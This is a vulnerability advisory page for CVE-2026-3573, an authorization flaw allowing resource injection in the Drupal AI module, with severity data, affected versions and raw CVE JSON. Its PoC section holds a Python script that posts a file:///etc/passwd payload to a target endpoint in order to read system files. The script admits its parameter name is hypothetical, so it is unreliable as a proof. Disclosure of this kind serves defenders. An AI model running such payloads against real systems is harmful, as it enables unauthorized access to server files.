Security Vulnerability Report
中文
CVE-2026-3573 CVSS 7.5 HIGH

CVE-2026-3573

Published: 2026-03-26 21:17:10
Last Modified: 2026-03-31 20:41:56

Description

Incorrect Authorization vulnerability in Drupal AI (Artificial Intelligence) allows Resource Injection.This issue affects AI (Artificial Intelligence): from 0.0.0 before 1.1.11, from 1.2.0 before 1.2.12.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:artificial_intelligence_project:artificial_intelligence:*:*:*:*:*:drupal:*:* - VULNERABLE
cpe:2.3:a:artificial_intelligence_project:artificial_intelligence:*:*:*:*:*:drupal:*:* - VULNERABLE
Drupal AI >= 0.0.0, < 1.1.11
Drupal AI >= 1.2.0, < 1.2.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # POC for CVE-2026-3573: Resource Injection in Drupal AI # This script attempts to inject a resource identifier to exploit incorrect authorization. TARGET_URL = "http://[TARGET]/drupal/modules/ai/api/endpoint" # Attempting to inject a local file path as a resource # The parameter name 'resource' is hypothetical and represents the vulnerable input field payload = { "prompt": "test", "resource": "file:///etc/passwd" } try: print(f"Sending request to {TARGET_URL}...") response = requests.post(TARGET_URL, data=payload, timeout=10) if response.status_code == 200: print("[+] Potential exploitation successful!") print("[+] Response content:") print(response.text[:200]) # Print first 200 chars to check for file content else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3573", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:09.557", "lastModified": "2026-03-31T20:41:55.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Authorization vulnerability in Drupal AI (Artificial Intelligence) allows Resource Injection.This issue affects AI (Artificial Intelligence): from 0.0.0 before 1.1.11, from 1.2.0 before 1.2.12."}, {"lang": "es", "value": "Vulnerabilidad de autorización incorrecta en Drupal IA (Inteligencia Artificial) permite la inyección de recursos. Este problema afecta a IA (Inteligencia Artificial): desde 0.0.0 antes de 1.1.11, desde 1.2.0 antes de 1.2.12."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:artificial_intelligence_project:artificial_intelligence:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "1.1.11", "matchCriteriaId": "71AE206A-B714-49CF-8581-AB8B167F0C05"}, {"vulnerable": true, "criteria": "cpe:2.3:a:artificial_intelligence_project:artificial_intelligence:*:*:*:*:*:drupal:*:*", "versionStartIncluding": "1.2.0", "versionEndExcluding": "1.2.12", "matchCriteriaId": "B8C36E65-EE16-4222-BA85-3A449B810D5C"}]}]}], "references": [{"url": "https://www.drupal.org/sa-contrib-2026-028", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}